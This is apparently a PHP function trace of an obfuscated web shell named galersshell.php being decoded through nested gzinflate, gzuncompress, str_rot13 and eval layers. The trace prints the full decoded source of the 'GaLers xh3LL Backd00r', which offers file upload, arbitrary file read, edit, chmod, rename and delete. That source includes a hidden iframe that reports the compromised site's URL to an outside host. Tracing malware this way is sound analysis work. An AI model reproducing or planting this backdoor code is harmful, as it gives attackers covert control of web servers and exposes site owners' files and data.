3 13 R 'x�\001�\ta�\001�\tf�x�\001�\tq��Yms�H\022��*����EP\vH8^�\017\020�8g;w�\025���1>JҎ�`"K\003LY���랑`\004Bf}��tql�L�3�=O�\ftO��O����*�`�8Ĝ3�-�$MR\031����?�5�u���y�\0339��]��b���y������#FWLi��$`��;f,\002?\t\'m�sy�̹��Y��\0352\0261���I\002\0329r�\000\026\017�p\021�y�4�\'߬1\005՚��Ɍ3G*j���Z�gtP���!\023\v>L�B��]CU(��rߣL�3�rOL��3\\�3\021\r\035y�\aÙ\037Uk����\036�a4�V�oO�/H\030��#�8���0\031q�P#���\016�\0250*� \tAݠ�J�2����3���ӫ���ɧ�/7��������D��dN��1\fBy�\030�q�əA����=�� 0p\002\023,�\r'
3 14 0 0.001442 408368 gzuncompress 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code 1 1 'x�\001�\ta�\001�\tf�x�\001�\tq��Yms�H\022��*����EP\vH8^�\017\020�8g;w�\025���1>JҎ�`"K\003LY���랑`\004Bf}��tql�L�3�=O�\ftO��O����*�`�8Ĝ3�-�$MR\031����?�5�u���y�\0339��]��b���y������#FWLi��$`��;f,\002?\t\'m�sy�̹��Y��\0352\0261���I\002\0329r�\000\026\017�p\021�y�4�\'߬1\005՚��Ɍ3G*j���Z�gtP���!\023\v>L�B��]CU(��rߣL�3�rOL��3\\�3\021\r\035y�\aÙ\037Uk����\036�a4�V�oO�/H\030��#�8���0\031q�P#���\016�\0250*� \tAݠ�J�2����3���ӫ���ɧ�/7��������D��dN��1\fBy�\030�q�əA����=�� 0p\002\023,�\r'
3 14 1 0.001549 410960
3 14 R '\001�\tf�x�\001�\tq��Yms�H\022��*����EP\vH8^�\017\020�8g;w�\025���1>JҎ�`"K\003LY���랑`\004Bf}��tql�L�3�=O�\ftO��O����*�`�8Ĝ3�-�$MR\031����?�5�u���y�\0339��]��b���y������#FWLi��$`��;f,\002?\t\'m�sy�̹��Y��\0352\0261���I\002\0329r�\000\026\017�p\021�y�4�\'߬1\005՚��Ɍ3G*j���Z�gtP���!\023\v>L�B��]CU(��rߣL�3�rOL��3\\�3\021\r\035y�\aÙ\037Uk����\036�a4�V�oO�/H\030��#�8���0\031q�P#���\016�\0250*� \tAݠ�J�2����3���ӫ���ɧ�/7��������D��dN��1\fBy�\030�q�əA����=�� 0p\002\023,�\r�\001�����!'
3 15 0 0.001637 408368 gzinflate 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code 1 1 '\001�\tf�x�\001�\tq��Yms�H\022��*����EP\vH8^�\017\020�8g;w�\025���1>JҎ�`"K\003LY���랑`\004Bf}��tql�L�3�=O�\ftO��O����*�`�8Ĝ3�-�$MR\031����?�5�u���y�\0339��]��b���y������#FWLi��$`��;f,\002?\t\'m�sy�̹��Y��\0352\0261���I\002\0329r�\000\026\017�p\021�y�4�\'߬1\005՚��Ɍ3G*j���Z�gtP���!\023\v>L�B��]CU(��rߣL�3�rOL��3\\�3\021\r\035y�\aÙ\037Uk����\036�a4�V�oO�/H\030��#�8���0\031q�P#���\016�\0250*� \tAݠ�J�2����3���ӫ���ɧ�/7��������D��dN��1\fBy�\030�q�əA����=�� 0p\002\023,�\r�\001�����!'
3 15 1 0.001723 410960
3 15 R 'x�\001�\tq��Yms�H\022��*����EP\vH8^�\017\020�8g;w�\025���1>JҎ�`"K\003LY���랑`\004Bf}��tql�L�3�=O�\ftO��O����*�`�8Ĝ3�-�$MR\031����?�5�u���y�\0339��]��b���y������#FWLi��$`��;f,\002?\t\'m�sy�̹��Y��\0352\0261���I\002\0329r�\000\026\017�p\021�y�4�\'߬1\005՚��Ɍ3G*j���Z�gtP���!\023\v>L�B��]CU(��rߣL�3�rOL��3\\�3\021\r\035y�\aÙ\037Uk����\036�a4�V�oO�/H\030��#�8���0\031q�P#���\016�\0250*� \tAݠ�J�2����3���ӫ���ɧ�/7��������D��dN��1\fBy�\030�q�əA����=�� 0p\002\023,�\r�\001�����!�a�\030�6'
3 16 0 0.001811 408368 gzuncompress 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code 1 1 'x�\001�\tq��Yms�H\022��*����EP\vH8^�\017\020�8g;w�\025���1>JҎ�`"K\003LY���랑`\004Bf}��tql�L�3�=O�\ftO��O����*�`�8Ĝ3�-�$MR\031����?�5�u���y�\0339��]��b���y������#FWLi��$`��;f,\002?\t\'m�sy�̹��Y��\0352\0261���I\002\0329r�\000\026\017�p\021�y�4�\'߬1\005՚��Ɍ3G*j���Z�gtP���!\023\v>L�B��]CU(��rߣL�3�rOL��3\\�3\021\r\035y�\aÙ\037Uk����\036�a4�V�oO�/H\030��#�8���0\031q�P#���\016�\0250*� \tAݠ�J�2����3���ӫ���ɧ�/7��������D��dN��1\fBy�\030�q�əA����=�� 0p\002\023,�\r�\001�����!�a�\030�6'
3 16 1 0.001896 410960
3 16 R '�Yms�H\022��*����EP\vH8^�\017\020�8g;w�\025���1>JҎ�`"K\003LY���랑`\004Bf}��tql�L�3�=O�\ftO��O����*�`�8Ĝ3�-�$MR\031����?�5�u���y�\0339��]��b���y������#FWLi��$`��;f,\002?\t\'m�sy�̹��Y��\0352\0261���I\002\0329r�\000\026\017�p\021�y�4�\'߬1\005՚��Ɍ3G*j���Z�gtP���!\023\v>L�B��]CU(��rߣL�3�rOL��3\\�3\021\r\035y�\aÙ\037Uk����\036�a4�V�oO�/H\030��#�8���0\031q�P#���\016�\0250*� \tAݠ�J�2����3���ӫ���ɧ�/7��������D��dN��1\fBy�\030�q�əA����=�� 0p\002\023,�\r�\001�����!�a�\030�6�Zj\020�$\b'
3 17 0 0.001983 408368 gzinflate 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code 1 1 '�Yms�H\022��*����EP\vH8^�\017\020�8g;w�\025���1>JҎ�`"K\003LY���랑`\004Bf}��tql�L�3�=O�\ftO��O����*�`�8Ĝ3�-�$MR\031����?�5�u���y�\0339��]��b���y������#FWLi��$`��;f,\002?\t\'m�sy�̹��Y��\0352\0261���I\002\0329r�\000\026\017�p\021�y�4�\'߬1\005՚��Ɍ3G*j���Z�gtP���!\023\v>L�B��]CU(��rߣL�3�rOL��3\\�3\021\r\035y�\aÙ\037Uk����\036�a4�V�oO�/H\030��#�8���0\031q�P#���\016�\0250*� \tAݠ�J�2����3���ӫ���ɧ�/7��������D��dN��1\fBy�\030�q�əA����=�� 0p\002\023,�\r�\001�����!�a�\030�6�Zj\020�$\b'
3 17 1 0.002116 420688
3 17 R '<?cuc \r\n\r\n$fvgr = \'uggc://\' . $_FREIRE[\'FREIRE_ANZR\'] . $_FREIRE[\'ERDHRFG_HEV\'];\r\nrpub "<vsenzr fglyr=\'qvfcynl:abar; urvtug: 0; jvqgu:0;\' fep=\'uggcf://fcnzfuryy.klm/jevgr.cuc?trg=$fvgr\'></vsenzr>";\r\n\r\nfrg_gvzr_yvzvg(0);\r\nreebe_ercbegvat(0);\r\n\r\nvs(trg_zntvp_dhbgrf_tcp()){\r\nsbernpu($_CBFG nf $xrl=>$inyhr){\r\n$_CBFG[$xrl] = fgevcfynfurf($inyhr);\r\n}\r\n}\r\nrpub \'<!QBPGLCR UGZY>\r\n<UGZY>\r\n<URNQ>\r\n<yvax uers="" ery="fglyrfurrg" glcr="grkg/pff">\r\n<gvgyr>TnYref ku3YY Onpxq00e'
3 18 0 0.002166 418096 str_rot13 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code 1 1 '<?cuc \r\n\r\n$fvgr = \'uggc://\' . $_FREIRE[\'FREIRE_ANZR\'] . $_FREIRE[\'ERDHRFG_HEV\'];\r\nrpub "<vsenzr fglyr=\'qvfcynl:abar; urvtug: 0; jvqgu:0;\' fep=\'uggcf://fcnzfuryy.klm/jevgr.cuc?trg=$fvgr\'></vsenzr>";\r\n\r\nfrg_gvzr_yvzvg(0);\r\nreebe_ercbegvat(0);\r\n\r\nvs(trg_zntvp_dhbgrf_tcp()){\r\nsbernpu($_CBFG nf $xrl=>$inyhr){\r\n$_CBFG[$xrl] = fgevcfynfurf($inyhr);\r\n}\r\n}\r\nrpub \'<!QBPGLCR UGZY>\r\n<UGZY>\r\n<URNQ>\r\n<yvax uers="" ery="fglyrfurrg" glcr="grkg/pff">\r\n<gvgyr>TnYref ku3YY Onpxq00e'
3 18 1 0.002214 430416
3 18 R '<?php \r\n\r\n$site = \'http://\' . $_SERVER[\'SERVER_NAME\'] . $_SERVER[\'REQUEST_URI\'];\r\necho "<iframe style=\'display:none; height: 0; width:0;\' src=\'https://spamshell.xyz/write.php?get=$site\'></iframe>";\r\n\r\nset_time_limit(0);\r\nerror_reporting(0);\r\n\r\nif(get_magic_quotes_gpc()){\r\nforeach($_POST as $key=>$value){\r\n$_POST[$key] = stripslashes($value);\r\n}\r\n}\r\necho \'<!DOCTYPE HTML>\r\n<HTML>\r\n<HEAD>\r\n<link href="" rel="stylesheet" type="text/css">\r\n<title>GaLers xh3LL Backd00r'
3 19 0 0.002512 471384 eval 1 '?><?php \r\n\r\n$site = \'http://\' . $_SERVER[\'SERVER_NAME\'] . $_SERVER[\'REQUEST_URI\'];\r\necho "<iframe style=\'display:none; height: 0; width:0;\' src=\'https://spamshell.xyz/write.php?get=$site\'></iframe>";\r\n\r\nset_time_limit(0);\r\nerror_reporting(0);\r\n\r\nif(get_magic_quotes_gpc()){\r\nforeach($_POST as $key=>$value){\r\n$_POST[$key] = stripslashes($value);\r\n}\r\n}\r\necho \'<!DOCTYPE HTML>\r\n<HTML>\r\n<HEAD>\r\n<link href="" rel="stylesheet" type="text/css">\r\n<title>GaLers xh3LL Backd00r</title>\r\n<style>\r\nbody{\r\nfont-family: "Racing Sans One", cursive;\r\nbackground-color: #e6e6e6;\r\ntext-shadow:0px 0px 1px #757575;\r\n}\r\n#content tr:hover{\r\nbackground-color: #636263;\r\ntext-shadow:0px 0px 10px #fff;\r\n}\r\n#content .first{\r\nbackground-color: silver;\r\n}\r\n#content .first:hover{\r\nbackground-color: silver;\r\ntext-shadow:0px 0px 1px #757575;\r\n}\r\ntable{\r\nborder: 1px #000000 dotted;\r\n}\r\nH1{\r\nfont-family: "Rye", cursive;\r\n}\r\na{\r\ncolor: #000;\r\ntext-decoration: none;\r\n}\r\na:hover{\r\ncolor: #fff;\r\ntext-shadow:0px 0px 10px #ffffff;\r\n}\r\ninput,select,textarea{\r\nborder: 1px #000000 solid;\r\n-moz-border-radius: 5px;\r\n-webkit-border-radius:5px;\r\nborder-radius:5px;\r\n}\r\n</style>\r\n</HEAD>\r\n<BODY>\r\n<H1><center>[#] GaLers xh3LL Backd00r [#] </center></H1>\r\n<table width="700" border="0" cellpadding="3" cellspacing="1" align="center">\r\n<tr><td>Current Path : \';\r\nif(isset($_GET[\'path\'])){\r\n$path = $_GET[\'path\'];\r\n}else{\r\n$path = getcwd();\r\n}\r\n$path = str_replace(\'\\\\\',\'/\',$path);\r\n$paths = explode(\'/\',$path);\r\n\r\nforeach($paths as $id=>$pat){\r\nif($pat == \'\' && $id == 0){\r\n$a = true;\r\necho \'<a href="?path=/">/</a>\';\r\ncontinue;\r\n}\r\nif($pat == \'\') continue;\r\necho \'<a href="?path=\';\r\nfor($i=0;$i<=$id;$i++){\r\necho "$paths[$i]";\r\nif($i != $id) echo "/";\r\n}\r\necho \'">\'.$pat.\'</a>/\';\r\n}\r\necho \'</td></tr><tr><td>\';\r\nif(isset($_FILES[\'file\'])){\r\nif(copy($_FILES[\'file\'][\'tmp_name\'],$path.\'/\'.$_FILES[\'file\'][\'name\'])){\r\necho \'<font color="green">File Upload Done Kakak ~_^ .</font><br />\';\r\n}else{\r\necho \'<font color="red">File Upload Error ~_~.</font><br />\';\r\n}\r\n}\r\necho \'<form enctype="multipart/form-data" method="POST">\r\nUpload File : <input type="file" name="file" />\r\n<input type="submit" value="upload" />\r\n</form>\r\n</td></tr>\';\r\nif(isset($_GET[\'filesrc\'])){\r\necho "<tr><td>Current File : ";\r\necho $_GET[\'filesrc\'];\r\necho \'</tr></td></table><br />\';\r\necho(\'<pre>\'.htmlspecialchars(file_get_contents($_GET[\'filesrc\'])).\'</pre>\');\r\n}elseif(isset($_GET[\'option\']) && $_POST[\'opt\'] != \'delete\'){\r\necho \'</table><br /><center>\'.$_POST[\'path\'].\'<br /><br />\';\r\nif($_POST[\'opt\'] == \'chmod\'){\r\nif(isset($_POST[\'perm\'])){\r\nif(chmod($_POST[\'path\'],$_POST[\'perm\'])){\r\necho \'<font color="green">Change Permission Done.</font><br />\';\r\n}else{\r\necho \'<font color="red">Change Permission Error.</font><br />\';\r\n}\r\n}\r\necho \'<form method="POST">\r\nPermission : <input name="perm" type="text" size="4" value="\'.substr(sprintf(\'%o\', fileperms($_POST[\'path\'])), -4).\'" />\r\n<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\r\n<input type="hidden" name="opt" value="chmod">\r\n<input type="submit" value="Go" />\r\n</form>\';\r\n}elseif($_POST[\'opt\'] == \'rename\'){\r\nif(isset($_POST[\'newname\'])){\r\nif(rename($_POST[\'path\'],$path.\'/\'.$_POST[\'newname\'])){\r\necho \'<font color="green">Change Name Done.</font><br />\';\r\n}else{\r\necho \'<font color="red">Change Name Error.</font><br />\';\r\n}\r\n$_POST[\'name\'] = $_POST[\'newname\'];\r\n}\r\necho \'<form method="POST">\r\nNew Name : <input name="newname" type="text" size="20" value="\'.$_POST[\'name\'].\'" />\r\n<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\r\n<input type="hidden" name="opt" value="rename">\r\n<input type="submit" value="Go" />\r\n</form>\';\r\n}elseif($_POST[\'opt\'] == \'edit\'){\r\nif(isset($_POST[\'src\'])){\r\n$fp = fopen($_POST[\'path\'],\'w\');\r\nif(fwrite($fp,$_POST[\'src\'])){\r\necho \'<font color="green">Edit File Done ~_^.</font><br />\';\r\n}else{\r\necho \'<font color="red">Edit File Error ~_~.</font><br />\';\r\n}\r\nfclose($fp);\r\n}\r\necho \'<form method="POST">\r\n<textarea cols=80 rows=20 name="src">\'.htmlspecialchars(file_get_contents($_POST[\'path\'])).\'</textarea><br />\r\n<input type="hidden" name="path" value="\'.$_POST[\'path\'].\'">\r\n<input type="hidden" name="opt" value="edit">\r\n<input type="submit" value="Go" />\r\n</form>\';\r\n}\r\necho \'</center>\';\r\n}else{\r\necho \'</table><br /><center>\';\r\nif(isset($_GET[\'option\']) && $_POST[\'opt\'] == \'delete\'){\r\nif($_POST[\'type\'] == \'dir\'){\r\nif(rmdir($_POST[\'path\'])){\r\necho \'<font color="green">Delete Dir Done.</font><br />\';\r\n}else{\r\necho \'<font color="red">Delete Dir Error.</font><br />\';\r\n}\r\n}elseif($_POST[\'type\'] == \'file\'){\r\nif(unlink($_POST[\'path\'])){\r\necho \'<font color="green">Delete File Done.</font><br />\';\r\n}else{\r\necho \'<font color="red">Delete File Error.</font><br />\';\r\n}\r\n}\r\n}\r\necho \'</center>\';\r\n$scandir = scandir($path);\r\necho \'<div id="content"><table width="700" border="0" cellpadding="3" cellspacing="1" align="center">\r\n<tr class="first">\r\n<td><center>Name</center></td>\r\n<td><center>Size</center></td>\r\n<td><center>Permissions</center></td>\r\n<td><center>Options</center></td>\r\n</tr>\';\r\n\r\nforeach($scandir as $dir){\r\nif(!is_dir("$path/$dir") || $dir == \'.\' || $dir == \'..\') continue;\r\necho "<tr>\r\n<td><a href=\\"?path=$path/$dir\\">$dir</a></td>\r\n<td><center>--</center></td>\r\n<td><center>";\r\nif(is_writable("$path/$dir")) echo \'<font color="green">\';\r\nelseif(!is_readable("$path/$dir")) echo \'<font color="red">\';\r\necho perms("$path/$dir");\r\nif(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo \'</font>\';\r\n\r\necho "</center></td>\r\n<td><center><form method=\\"POST\\" action=\\"?option&path=$path\\">\r\n<select name=\\"opt\\">\r\n<option value=\\"\\"></option>\r\n<option value=\\"delete\\">Delete</option>\r\n<option value=\\"chmod\\">Chmod</option>\r\n<option value=\\"rename\\">Rename</option>\r\n</select>\r\n<input type=\\"hidden\\" name=\\"type\\" value=\\"dir\\">\r\n<input type=\\"hidden\\" name=\\"name\\" value=\\"$dir\\">\r\n<input type=\\"hidden\\" name=\\"path\\" value=\\"$path/$dir\\">\r\n<input type=\\"submit\\" value=\\">\\" />\r\n</form></center></td>\r\n</tr>";\r\n}\r\necho \'<tr class="first"><td></td><td></td><td></td><td></td></tr>\';\r\nforeach($scandir as $file){\r\nif(!is_file("$path/$file")) continue;\r\n$size = filesize("$path/$file")/1024;\r\n$size = round($size,3);\r\nif($size >= 1024){\r\n$size = round($size/1024,2).\' MB\';\r\n}else{\r\n$size = $size.\' KB\';\r\n}\r\n\r\necho "<tr>\r\n<td><a href=\\"?filesrc=$path/$file&path=$path\\">$file</a></td>\r\n<td><center>".$size."</center></td>\r\n<td><center>";\r\nif(is_writable("$path/$file")) echo \'<font color="green">\';\r\nelseif(!is_readable("$path/$file")) echo \'<font color="red">\';\r\necho perms("$path/$file");\r\nif(is_writable("$path/$file") || !is_readable("$path/$file")) echo \'</font>\';\r\necho "</center></td>\r\n<td><center><form method=\\"POST\\" action=\\"?option&path=$path\\">\r\n<select name=\\"opt\\">\r\n<option value=\\"\\"></option>\r\n<option value=\\"delete\\">Delete</option>\r\n<option value=\\"chmod\\">Chmod</option>\r\n<option value=\\"rename\\">Rename</option>\r\n<option value=\\"edit\\">Edit</option>\r\n</select>\r\n<input type=\\"hidden\\" name=\\"type\\" value=\\"file\\">\r\n<input type=\\"hidden\\" name=\\"name\\" value=\\"$file\\">\r\n<input type=\\"hidden\\" name=\\"path\\" value=\\"$path/$file\\">\r\n<input type=\\"submit\\" value=\\">\\" />\r\n</form></center></td>\r\n</tr>";\r\n}\r\necho \'</table>\r\n</div>\';\r\n}\r\necho \'<br />Mr. DellatioNx196 GaLers xh3LL Backd00r <font color="red">1.0</font>, Coded By <font color="red">Mr. DellatioNx196 - Bogor BlackHat</font>\r\n</BODY>\r\n</HTML>\';\r\nfunction perms($file){\r\n$perms = fileperms($file);\r\n\r\nif (($perms & 0xC000) == 0xC000) {\r\n// Socket\r\n$info = \'s\';\r\n} elseif (($perms & 0xA000) == 0xA000) {\r\n// Symbolic Link\r\n$info = \'l\';\r\n} elseif (($perms & 0x8000) == 0x8000) {\r\n// Regular\r\n$info = \'-\';\r\n} elseif (($perms & 0x6000) == 0x6000) {\r\n// Block special\r\n$info = \'b\';\r\n} elseif (($perms & 0x4000) == 0x4000) {\r\n// Directory\r\n$info = \'d\';\r\n} elseif (($perms & 0x2000) == 0x2000) {\r\n// Character special\r\n$info = \'c\';\r\n} elseif (($perms & 0x1000) == 0x1000) {\r\n// FIFO pipe\r\n$info = \'p\';\r\n} else {\r\n// Unknown\r\n$info = \'u\';\r\n}\r\n\r\n// Owner\r\n$info .= (($perms & 0x0100) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0080) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0040) ?\r\n(($perms & 0x0800) ? \'s\' : \'x\' ) :\r\n(($perms & 0x0800) ? \'S\' : \'-\'));\r\n\r\n// Group\r\n$info .= (($perms & 0x0020) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0010) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0008) ?\r\n(($perms & 0x0400) ? \'s\' : \'x\' ) :\r\n(($perms & 0x0400) ? \'S\' : \'-\'));\r\n\r\n// World\r\n$info .= (($perms & 0x0004) ? \'r\' : \'-\');\r\n$info .= (($perms & 0x0002) ? \'w\' : \'-\');\r\n$info .= (($perms & 0x0001) ?\r\n(($perms & 0x0200) ? \'t\' : \'x\' ) :\r\n(($perms & 0x0200) ? \'T\' : \'-\'));\r\n\r\nreturn $info;\r\n}\r\n?>' /var/www/html/uploads/galersshell.php(4) : eval()'d code 1 0
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 3 $site = 'http://localhost/uploads/galersshell.php'
4 20 0 0.002721 471464 set_time_limit 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 6 1 0
4 20 1 0.002738 471528
4 20 R FALSE
4 21 0 0.002758 471496 error_reporting 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 7 1 0
4 21 1 0.002773 471536
4 21 R 22527
4 22 0 0.002786 471496 get_magic_quotes_gpc 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 9 0
4 22 1 0.002800 471496
4 22 R FALSE
4 23 0 0.002814 471496 getcwd 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 65 0
4 23 1 0.002829 471544
4 23 R '/var/www/html/uploads'
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 65 $path = '/var/www/html/uploads'
4 24 0 0.002856 471544 str_replace 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 67 3 '\\' '/' '/var/www/html/uploads'
4 24 1 0.002873 471640
4 24 R '/var/www/html/uploads'
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 67 $path = '/var/www/html/uploads'
4 25 0 0.002899 471544 explode 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 68 2 '/' '/var/www/html/uploads'
4 25 1 0.002915 472120
4 25 R [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 68 $paths = [0 => '', 1 => 'var', 2 => 'www', 3 => 'html', 4 => 'uploads']
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 70 $id = 0
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 72 $a = TRUE
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 70 $id = 1
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 78 $i = 0
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 78 $i++
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 78 $i++
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 70 $id = 2
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 78 $i = 0
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 78 $i++
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 78 $i++
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 78 $i++
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 70 $id = 3
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 78 $i = 0
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 78 $i++
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 78 $i++
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 78 $i++
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 78 $i++
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 70 $id = 4
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 78 $i = 0
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 78 $i++
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 78 $i++
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 78 $i++
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 78 $i++
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 78 $i++
4 26 0 0.003177 472048 scandir 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 169 1 '/var/www/html/uploads'
4 26 1 0.003213 472672
4 26 R [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'galersshell.php', 5 => 'prepend.php']
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 169 $scandir = [0 => '.', 1 => '..', 2 => '.htaccess', 3 => 'data', 4 => 'galersshell.php', 5 => 'prepend.php']
4 27 0 0.003253 472688 is_dir 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 179 1 '/var/www/html/uploads/.'
4 27 1 0.003272 472752
4 27 R TRUE
4 28 0 0.003286 472720 is_dir 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 179 1 '/var/www/html/uploads/..'
4 28 1 0.003302 472768
4 28 R TRUE
4 29 0 0.003316 472728 is_dir 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 179 1 '/var/www/html/uploads/.htaccess'
4 29 1 0.003332 472768
4 29 R FALSE
4 30 0 0.003346 472728 is_dir 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 179 1 '/var/www/html/uploads/data'
4 30 1 0.003366 472768
4 30 R TRUE
4 31 0 0.003380 472728 is_writable 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 184 1 '/var/www/html/uploads/data'
4 31 1 0.003398 472768
4 31 R TRUE
4 32 0 0.003412 472728 perms 1 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 186 1 '/var/www/html/uploads/data'
5 33 0 0.003426 472728 fileperms 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 246 1 '/var/www/html/uploads/data'
5 33 1 0.003440 472768
5 33 R 16895
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 246 $perms = 16895
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 262 $info = 'd'
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 275 $info .= 'r'
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 276 $info .= 'w'
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 279 $info .= 'x'
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 282 $info .= 'r'
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 283 $info .= 'w'
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 286 $info .= 'x'
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 289 $info .= 'r'
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 290 $info .= 'w'
4 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 293 $info .= 'x'
4 32 1 0.003572 472768
4 32 R 'drwxrwxrwx'
4 34 0 0.003587 472728 is_writable 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 187 1 '/var/www/html/uploads/data'
4 34 1 0.003604 472768
4 34 R TRUE
4 35 0 0.003618 472736 is_dir 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 179 1 '/var/www/html/uploads/galersshell.php'
4 35 1 0.003634 472784
4 35 R FALSE
4 36 0 0.003648 472744 is_dir 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 179 1 '/var/www/html/uploads/prepend.php'
4 36 1 0.003664 472784
4 36 R FALSE
4 37 0 0.003678 472728 is_file 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 206 1 '/var/www/html/uploads/.'
4 37 1 0.003693 472752
4 37 R FALSE
4 38 0 0.003707 472720 is_file 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 206 1 '/var/www/html/uploads/..'
4 38 1 0.003722 472768
4 38 R FALSE
4 39 0 0.003735 472728 is_file 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 206 1 '/var/www/html/uploads/.htaccess'
4 39 1 0.003750 472768
4 39 R TRUE
4 40 0 0.003763 472728 filesize 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 207 1 '/var/www/html/uploads/.htaccess'
4 40 1 0.003778 472768
4 40 R 64
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 207 $size = 0.0625
4 41 0 0.003803 472672 round 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 208 2 0.0625 3
4 41 1 0.003819 472744
4 41 R 0.063
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 208 $size = 0.063
3 A /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 212 $size = '0.063 KB'
4 42 0 0.003858 472768 is_writable 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 219 1 '/var/www/html/uploads/.htaccess'
4 42 1 0.003874 472808
4 42 R FALSE
4 43 0 0.003887 472768 is_readable 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 220 1 '/var/www/html/uploads/.htaccess'
4 43 1 0.003903 472808
4 43 R TRUE
4 44 0 0.003917 472768 perms 1 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 221 1 '/var/www/html/uploads/.htaccess'
5 45 0 0.003931 472768 fileperms 0 /var/www/html/uploads/galersshell.php(4) : eval()'d code(1) : eval()'d code 246 1 '/var/www/html/uploads/.htaccess'
5 45 1 0.003945 472808
5 45 R 33188
